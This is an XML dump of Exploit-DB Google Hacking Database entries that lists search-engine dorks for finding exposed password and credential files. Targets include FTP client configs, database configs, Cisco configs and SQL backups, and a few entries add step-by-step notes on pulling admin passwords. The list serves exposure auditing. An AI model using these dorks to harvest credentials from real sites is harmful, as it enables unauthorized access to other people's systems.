<link>https://www.exploit-db.com/ghdb/3750</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;/Application Data/Filezilla/*&quot; OR inurl:&quot;/AppData/Filezilla/*&quot; filetype:xml</shortDescription>
<textualDescription>this dork locates files containing ftp passwords
</textualDescription>
<query>inurl:&quot;/Application Data/Filezilla/*&quot; OR inurl:&quot;/AppData/Filezilla/*&quot; filetype:xml</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Application%20Data/Filezilla/*&quot; OR inurl:&quot;/AppData/Filezilla/*&quot; filetype:xml</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3817</id>
<link>https://www.exploit-db.com/ghdb/3817</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;/dbman/default.pass&quot;</shortDescription>
<textualDescription>A path to a DES encrypted password for DBMan (
http://www.gossamer-threads.com/products/archive.html) ranging from Guest
to Admin account, this is often found coupled with cgi-telnet.pl (
http://www.rohitab.com/cgi-telnet) which provides an admin login, by
default and the password provided by DBMan's path /dbman/default.pass
I have already posted this to packetstorm on June 7th 2004, called
cgitelnetdbman (
http://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)
The 'Dork' is *inurl:&quot;/dbman/default.pass&quot; *
Lawrence Lavigne (ratdance)
-suidrewt</textualDescription>
<query>inurl:&quot;/dbman/default.pass&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/dbman/default.pass&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>ratdance</author>
</entry>
<entry>
<id>4331</id>
<link>https://www.exploit-db.com/ghdb/4331</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;/wp-content/wpclone-temp/wpclone_backup/&quot;</shortDescription>
<textualDescription>Author: Charley Celice (@charleycelice)
This dorks often results in backed-up &quot;database.sql&quot; files, which contain
WordPress usernames and passwords.
-stmerry</textualDescription>
<query>inurl:&quot;/wp-content/wpclone-temp/wpclone_backup/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/wpclone-temp/wpclone_backup/&quot;</querystring>
<edb></edb>
<date>2016-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4470</id>
<link>https://www.exploit-db.com/ghdb/4470</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;/zebra.conf&quot; ext:conf -git</shortDescription>
<textualDescription>Finds GNU Zebra login credentials
Dxtroyer</textualDescription>
<query>inurl:&quot;/zebra.conf&quot; ext:conf -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/zebra.conf&quot; ext:conf -git</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4959</id>
<link>https://www.exploit-db.com/ghdb/4959</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;build.xml&quot; intext:&quot;tomcat.manager.password&quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
inurl:&quot;build.xml&quot; intext:&quot;tomcat.manager.password&quot;
Author: Xin Min
This dork allows you to search for password of tomcat manager.</textualDescription>
<query>inurl:&quot;build.xml&quot; intext:&quot;tomcat.manager.password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;build.xml&quot; intext:&quot;tomcat.manager.password&quot;</querystring>
<edb></edb>
<date>2018-09-20</date>
<author>Xin Min</author>
</entry>
<entry>
<id>1295</id>
<link>https://www.exploit-db.com/ghdb/1295</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;calendarscript/users.txt&quot;</shortDescription>
<textualDescription>CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:&quot;Calendar Administration : Login&quot; | inurl:&quot;calendar/admin/index.asp&quot; -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator.</textualDescription>
<query>inurl:&quot;calendarscript/users.txt&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22calendarscript/users.txt%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4757</id>
<link>https://www.exploit-db.com/ghdb/4757</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;config.xml&quot; &quot;password&quot; ext:xml -stackoverflow.com -github.com</shortDescription>
<textualDescription>Several XML config files containing passwords and other interesting info
Bruno Schmid
</textualDescription>
<query>inurl:&quot;config.xml&quot; &quot;password&quot; ext:xml -stackoverflow.com -github.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;config.xml&quot; &quot;password&quot; ext:xml -stackoverflow.com -github.com</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4766</id>
<link>https://www.exploit-db.com/ghdb/4766</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;databases.yml&quot; ext:yml password -github</shortDescription>
<textualDescription>Symfony databases passwords.
Bruno Schmid
</textualDescription>
<query>inurl:&quot;databases.yml&quot; ext:yml password -github</query>
<querystring>https://www.google.com/search?q=inurl:&quot;databases.yml&quot; ext:yml password -github</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1238</id>
<link>https://www.exploit-db.com/ghdb/1238</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;editor/list.asp&quot; | inurl:&quot;database_editor.asp&quot; | inurl:&quot;login.asa&quot; &quot;are set&quot;</shortDescription>
<textualDescription>This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. At time of submitting there are 21 results.Also a search for the logins:inurl:&quot;Results/editor/login.asp&quot;&quot;Database Editor Login&quot; &quot;Results Page&quot;</textualDescription>
<query>inurl:&quot;editor/list.asp&quot; | inurl:&quot;database_editor.asp&quot; | inurl:&quot;login.asa&quot; &quot;are set&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22editor/list.asp%22+%7C+inurl:%22database_editor.asp%22+%7C+inurl:%22login.asa%22+%22are+set%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4124</id>
<link>https://www.exploit-db.com/ghdb/4124</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;ftp&quot; intext:&quot;user&quot; | &quot;username&quot; | &quot;userID&quot; | &quot;user ID&quot; | &quot;logon&quot; | &quot;login&quot; intext:&quot;password&quot; | &quot;passcode&quot; filetype:xls | filetype:xlsx</shortDescription>
<textualDescription>Passwords :D
Decoy</textualDescription>
<query>inurl:&quot;ftp&quot; intext:&quot;user&quot; | &quot;username&quot; | &quot;userID&quot; | &quot;user ID&quot; | &quot;logon&quot; | &quot;login&quot; intext:&quot;password&quot; | &quot;passcode&quot; filetype:xls | filetype:xlsx</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ftp&quot; intext:&quot;user&quot; | &quot;username&quot; | &quot;userID&quot; | &quot;user ID&quot; | &quot;logon&quot; | &quot;login&quot; intext:&quot;password&quot; | &quot;passcode&quot; filetype:xls | filetype:xlsx</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4603</id>
<link>https://www.exploit-db.com/ghdb/4603</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;gradle.properties&quot; intext:&quot;proxyPassword&quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
Exploit Author: Huijun Chen
</textualDescription>
<query>inurl:&quot;gradle.properties&quot; intext:&quot;proxyPassword&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;gradle.properties&quot; intext:&quot;proxyPassword&quot;</querystring>
<edb></edb>
<date>2017-10-30</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>720</id>
<link>https://www.exploit-db.com/ghdb/720</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;GRC.DAT&quot; intext:&quot;password&quot;</shortDescription>
<textualDescription>symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords.</textualDescription>
<query>inurl:&quot;GRC.DAT&quot; intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22GRC.DAT%22+intext%3A%22password%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3790</id>
<link>https://www.exploit-db.com/ghdb/3790</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;passes&quot; OR inurl:&quot;passwords&quot; OR inurl:&quot;credentials&quot; -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff</shortDescription>
<textualDescription>Hack the $cr1pt kiddies.
There are a lot of Phishing pages hosted on internet , this dork will
provide you with their password files. Clean and Simple
gr00ve_hack3r
www.gr00vehack3r.wordpress.com</textualDescription>
<query>inurl:&quot;passes&quot; OR inurl:&quot;passwords&quot; OR inurl:&quot;credentials&quot; -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff</query>
<querystring>https://www.google.com/search?q=inurl:&quot;passes&quot; OR inurl:&quot;passwords&quot; OR inurl:&quot;credentials&quot; -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3986</id>
<link>https://www.exploit-db.com/ghdb/3986</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;security/xamppdirpasswd.txt&quot;</shortDescription>
<textualDescription>This dork shows the plain text password saved in a XAMPP installation when
the administrator configures &quot;Security Console MySQL &amp; XAMPP directory
protection&quot;:
inurl:&quot;security/xamppdirpasswd.txt&quot;
Author: @felmoltor
--
Felipe Molina de la Torre</textualDescription>
<query>inurl:&quot;security/xamppdirpasswd.txt&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;security/xamppdirpasswd.txt&quot;</querystring>
<edb></edb>
<date>2015-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4791</id>
<link>https://www.exploit-db.com/ghdb/4791</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;servlet/ViewFormServlet?&quot; &quot;pwd&quot;</shortDescription>
<textualDescription> BMC Remedy Mid Tier gives username and password in the url.
Some commands are also possible, like password reset and so on.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;servlet/ViewFormServlet?&quot; &quot;pwd&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;servlet/ViewFormServlet?&quot; &quot;pwd&quot;</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4563</id>
<link>https://www.exploit-db.com/ghdb/4563</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;sitemanager.xml&quot; ext:xml -git</shortDescription>
<textualDescription>Finds FileZilla site manager files, containing FTP usernames and passwords
Dxtroyer</textualDescription>
<query>inurl:&quot;sitemanager.xml&quot; ext:xml -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sitemanager.xml&quot; ext:xml -git</querystring>
<edb></edb>
<date>2017-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1174</id>
<link>https://www.exploit-db.com/ghdb/1174</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;Sites.dat&quot;+&quot;PASS=&quot;</shortDescription>
<textualDescription>FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects.</textualDescription>
<query>inurl:&quot;Sites.dat&quot;+&quot;PASS=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22Sites.dat%22%2B%22PASS%3D%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>254</id>
<link>https://www.exploit-db.com/ghdb/254</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;slapd.conf&quot; intext:&quot;credentials&quot; -manpage -&quot;Manual Page&quot; -man: -sample</shortDescription>
<textualDescription>slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key &quot;credentinals&quot; contains passwords in cleartext.</textualDescription>
<query>inurl:&quot;slapd.conf&quot; intext:&quot;credentials&quot; -manpage -&quot;Manual Page&quot; -man: -sample</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22slapd.conf%22+intext%3A%22credentials%22+-manpage+-%22Manual+Page%22+-man%3A+-sample</querystring>
<edb></edb>
<date>2004-05-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>255</id>
<link>https://www.exploit-db.com/ghdb/255</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;slapd.conf&quot; intext:&quot;rootpw&quot; -manpage -&quot;Manual Page&quot; -man: -sample</shortDescription>
<textualDescription>slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the &quot;rootdn&quot;.</textualDescription>
<query>inurl:&quot;slapd.conf&quot; intext:&quot;rootpw&quot; -manpage -&quot;Manual Page&quot; -man: -sample</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22slapd.conf%22+intext%3A%22rootpw%22++-manpage+-%22Manual+Page%22+-man%3A+-sample</querystring>
<edb></edb>
<date>2004-05-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4970</id>
<link>https://www.exploit-db.com/ghdb/4970</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;standalone.xml&quot; intext:&quot;password&gt;&quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
inurl:&quot;standalone.xml&quot; intext:&quot;password&gt;&quot;
Author: Xin Min
This dork allows you to search for password of wildfly or jboss configuration.</textualDescription>
<query>inurl:&quot;standalone.xml&quot; intext:&quot;password&gt;&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;standalone.xml&quot; intext:&quot;password&gt;&quot;</querystring>
<edb></edb>
<date>2018-10-03</date>
<author>Xin Min</author>
</entry>
<entry>
<id>4952</id>
<link>https://www.exploit-db.com/ghdb/4952</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;trello.com&quot; and intext:&quot;username&quot; and intext:&quot;password&quot;</shortDescription>
<textualDescription>Looking for the Username &amp; Password from the public Trello board
Sang Bui
</textualDescription>
<query>inurl:&quot;trello.com&quot; and intext:&quot;username&quot; and intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;trello.com&quot; and intext:&quot;username&quot; and intext:&quot;password&quot;</querystring>
<edb></edb>
<date>2018-09-13</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>4940</id>
<link>https://www.exploit-db.com/ghdb/4940</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;wp-license.php?file=../..//wp-config&quot;</shortDescription>
<textualDescription>inurl:&quot;wp-license.php?file=../..//wp-config&quot;
File contain password and directory traversal vulnerability
ManhNho
</textualDescription>
<query>inurl:&quot;wp-license.php?file=../..//wp-config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-license.php?file=../..//wp-config&quot;</querystring>
<edb></edb>
<date>2018-09-10</date>
<author>ManhNho</author>
</entry>
<entry>
<id>252</id>
<link>https://www.exploit-db.com/ghdb/252</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;wvdial.conf&quot; intext:&quot;password&quot;</shortDescription>
<textualDescription>The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext.</textualDescription>
<query>inurl:&quot;wvdial.conf&quot; intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3A%22wvdial.conf%22+intext%3A%22password%22&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5969</id>
<link>https://www.exploit-db.com/ghdb/5969</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:*helpdesk* intext:&quot;your default password is&quot;</shortDescription>
<textualDescription>Author: MiningOmerta
Information: Finds default passwords in some pleace that may have not been seen before
Dork:
inurl:*helpdesk* intext:&quot;your default password is&quot;
</textualDescription>
<query>inurl:*helpdesk* intext:&quot;your default password is&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*helpdesk* intext:&quot;your default password is&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>1427</id>
<link>https://www.exploit-db.com/ghdb/1427</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:-cfg intext:&quot;enable password&quot;</shortDescription>
<textualDescription>Google search for Cisco config files (some variants below):
inurl:router-confg
inurl:-confg intext:enable password
inurl:-config intext:&quot;enable password&quot;
inurl:-cfg intext:&quot;enable secret&quot;
inurl:-confg intext:enable secret
inurl:-confg intext:&quot;enable secret&quot;
Author: fdisk</textualDescription>
<query>inurl:-cfg intext:&quot;enable password&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A-cfg+intext%3A%22enable+password%22&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3939</id>
<link>https://www.exploit-db.com/ghdb/3939</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/backup intitle:index of backup intext:*sql</shortDescription>
<textualDescription>Google Search:https://www.google.com/search?client=opera&amp;q=admin+username+and+pass&amp;sourceid=opera&amp;ie=UTF-8&amp;oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&amp;start=70
1)Find the Back Up
2)Downlod it
3)Import it into phpmyadmin
4)Find the admin username and password :)
Dork submitted by The Vi9er
Good Luck</textualDescription>
<query>inurl:/backup intitle:index of backup intext:*sql</query>
<querystring>https://www.google.com/search?q=inurl:/backup intitle:index of backup intext:*sql</querystring>
<edb></edb>
<date>2014-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>427</id>
<link>https://www.exploit-db.com/ghdb/427</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/db/main.mdb</shortDescription>
<textualDescription>ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location.</textualDescription>
<query>inurl:/db/main.mdb</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fdb%2Fmain.mdb</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4891</id>
<link>https://www.exploit-db.com/ghdb/4891</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/dbcp.properties + filetype:properties -github.com</shortDescription>
<textualDescription>inurl:/dbcp.properties + filetype:properties -github.com
file containing password
ManhNho
</textualDescription>
<query>inurl:/dbcp.properties + filetype:properties -github.com</query>
<querystring>https://www.google.com/search?q=inurl:/dbcp.properties + filetype:properties -github.com</querystring>
<edb></edb>
<date>2018-07-13</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4755</id>
<link>https://www.exploit-db.com/ghdb/4755</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/host.txt + filetype:txt + &quot;password&quot;</shortDescription>
<textualDescription>inurl:/host.txt + filetype:txt + &quot;password&quot;
File containing passwords
ManhNho
</textualDescription>
<query>inurl:/host.txt + filetype:txt + &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/host.txt + filetype:txt + &quot;password&quot;</querystring>
<edb></edb>
<date>2018-04-10</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6881</id>
<link>https://www.exploit-db.com/ghdb/6881</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/wp-content/uploads/ ext:txt &quot;username&quot; AND &quot;password&quot; | &quot;pwd&quot; | &quot;pw&quot;</shortDescription>
<textualDescription># Dork: inurl:/wp-content/uploads/ ext:txt &quot;username&quot; AND &quot;password&quot; | &quot;pwd&quot; | &quot;pw&quot;</textualDescription>
<query>inurl:/wp-content/uploads/ ext:txt &quot;username&quot; AND &quot;password&quot; | &quot;pwd&quot; | &quot;pw&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/ ext:txt &quot;username&quot; AND &quot;password&quot; | &quot;pwd&quot; | &quot;pw&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7040</id>
<link>https://www.exploit-db.com/ghdb/7040</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/wp-content/uploads/data.txt</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/data.txt
# Files Containing Passwords
# Date: 22/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:/wp-content/uploads/data.txt</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/data.txt</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>397</id>
<link>https://www.exploit-db.com/ghdb/397</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/wwwboard</shortDescription>
<textualDescription>The software wwwboard stores its passwords in a file called &quot;passwd.txt&quot;.An attacker may try to search forinurl:/wwwboardthen add a &quot;passwd.txt&quot; to it (../wwwboard/passwd.txt) and decrypt des DES passwords.</textualDescription>
<query>inurl:/wwwboard</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3A%2Fwwwboard</querystring>
<edb></edb>
<date>2004-08-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>1153</id>
<link>https://www.exploit-db.com/ghdb/1153</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:/yabb/Members/Admin.dat</shortDescription>
<textualDescription>This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords).</textualDescription>
<query>inurl:/yabb/Members/Admin.dat</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fyabb%2FMembers%2FAdmin.dat</querystring>
<edb></edb>
<date>2005-09-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>285</id>
<link>https://www.exploit-db.com/ghdb/285</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:ccbill filetype:log</shortDescription>
<textualDescription>CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word &quot;hot&quot; in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&amp;act=ST&amp;f=19&amp;t=4242.</textualDescription>
<query>inurl:ccbill filetype:log</query>
<querystring>https://www.google.com/search?q=filetype%3Alog+inurl%3Accbill</querystring>
<edb></edb>
<date>2004-06-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1023</id>
<link>https://www.exploit-db.com/ghdb/1023</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:cgi-bin inurl:calendar.cfg</shortDescription>
<textualDescription>CGI Calendar (Perl) configuration file reveals information including passwords for the program.</textualDescription>
<query>inurl:cgi-bin inurl:calendar.cfg</query>
<querystring>https://www.google.com/search?q=inurl%3Acgi-bin+inurl%3Acalendar.cfg</querystring>
<edb></edb>
<date>2005-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>646</id>
<link>https://www.exploit-db.com/ghdb/646</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:chap-secrets -cvs</shortDescription>
<textualDescription>linux vpns store their usernames and passwords for CHAP authentification in a file called &quot;chap-secrets&quot; where the usernames and the passwords are in cleartext.</textualDescription>
<query>inurl:chap-secrets -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3Achap-secrets+-cvs+&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>49</id>
<link>https://www.exploit-db.com/ghdb/49</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:config.php dbuname dbpass</shortDescription>
<textualDescription>The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!</textualDescription>
<query>inurl:config.php dbuname dbpass</query>
<querystring>https://www.google.com/search?q=inurl%3Aconfig%2Ephp+dbuname+dbpass</querystring>
<edb></edb>
<date>2003-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3669</id>
<link>https://www.exploit-db.com/ghdb/3669</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:config/databases.yml -trac -trunk -&quot;Google Code&quot; -source -repository</shortDescription>
<textualDescription>Google search for web site build with symfony framework. This file
contains the login / password for the databases
Author: Simon Leblanc</textualDescription>
<query>inurl:config/databases.yml -trac -trunk -&quot;Google Code&quot; -source -repository</query>
<querystring>https://www.google.com/search?q=inurl:config/databases.yml -trac -trunk -&quot;Google Code&quot; -source -repository</querystring>
<edb></edb>
<date>2011-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4892</id>
<link>https://www.exploit-db.com/ghdb/4892</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:configuration.php and intext:&quot;var $password=&quot;</shortDescription>
<textualDescription>Dork: *inurl:configuration.php and intext:&quot;var $password=&quot; *
A Google dork that gives
the information about target database. Containing username and password in
plain text.
Dork discovered by: Sachin Wagh (@tiger_tigerboy)
</textualDescription>
<query>inurl:configuration.php and intext:&quot;var $password=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:configuration.php and intext:&quot;var $password=&quot;</querystring>
<edb></edb>
<date>2018-07-16</date>
<author>Sachin Wagh</author>
</entry>
<entry>
<id>4106</id>
<link>https://www.exploit-db.com/ghdb/4106</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:etc -intext:etc ext:passwd</shortDescription>
<textualDescription>Files with a lot of passwords. Enjoy healthy!.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:etc -intext:etc ext:passwd</query>
<querystring>https://www.google.com/search?q=inurl:etc -intext:etc ext:passwd</querystring>
<edb></edb>
<date>2015-10-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>742</id>
<link>https://www.exploit-db.com/ghdb/742</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:filezilla.xml -cvs</shortDescription>
<textualDescription>filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla.</textualDescription>
<query>inurl:filezilla.xml -cvs</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Afilezilla.xml+-cvs</querystring>
<edb></edb>
<date>2004-12-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3742</id>
<link>https://www.exploit-db.com/ghdb/3742</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:ftp &quot;password&quot; filetype:xls</shortDescription>
<textualDescription>this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba
</textualDescription>
<query>inurl:ftp &quot;password&quot; filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl:ftp &quot;password&quot; filetype:xls</querystring>
<edb></edb>
<date>2011-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4376</id>
<link>https://www.exploit-db.com/ghdb/4376</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:github.com intitle:config intext:&quot;/msg nickserv identify&quot;</shortDescription>
<textualDescription>Github irc raw password:
inurl:github.com intitle:config intext:&quot;/msg nickserv identify&quot;
- al4r0</textualDescription>
<query>inurl:github.com intitle:config intext:&quot;/msg nickserv identify&quot;</query>
<querystring>https://www.google.com/search?q=inurl:github.com intitle:config intext:&quot;/msg nickserv identify&quot;</querystring>
<edb></edb>
<date>2016-12-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>333</id>
<link>https://www.exploit-db.com/ghdb/333</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man</shortDescription>
<textualDescription>LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives.</textualDescription>
<query>inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man</query>
<querystring>https://www.google.com/search?q=inurl%3Alilo.conf+filetype%3Aconf+password+-tatercounter2000+-bootpwd+-man&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5203</id>
<link>https://www.exploit-db.com/ghdb/5203</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:login.txt filetype:txt</shortDescription>
<textualDescription>I used this dork while doing some botnet research. All sorts of interesting
files pertaining to usernames/passwords for various C&amp;C servers, devices,
etc.
inurl:login.txt filetype:txt
</textualDescription>
<query>inurl:login.txt filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:login.txt filetype:txt</querystring>
<edb></edb>
<date>2019-05-07</date>
<author>Dec0y</author>
</entry>
<entry>
<id>6342</id>
<link>https://www.exploit-db.com/ghdb/6342</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:logs intext:GET https:// ext:txt intext:password intext:username</shortDescription>
<textualDescription>Dork: inurl:logs intext:GET https:// ext:txt intext:password intext:username
